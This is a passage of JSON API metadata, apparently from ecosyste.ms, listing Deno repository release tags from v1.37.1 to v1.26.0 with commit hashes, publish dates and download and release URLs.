"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno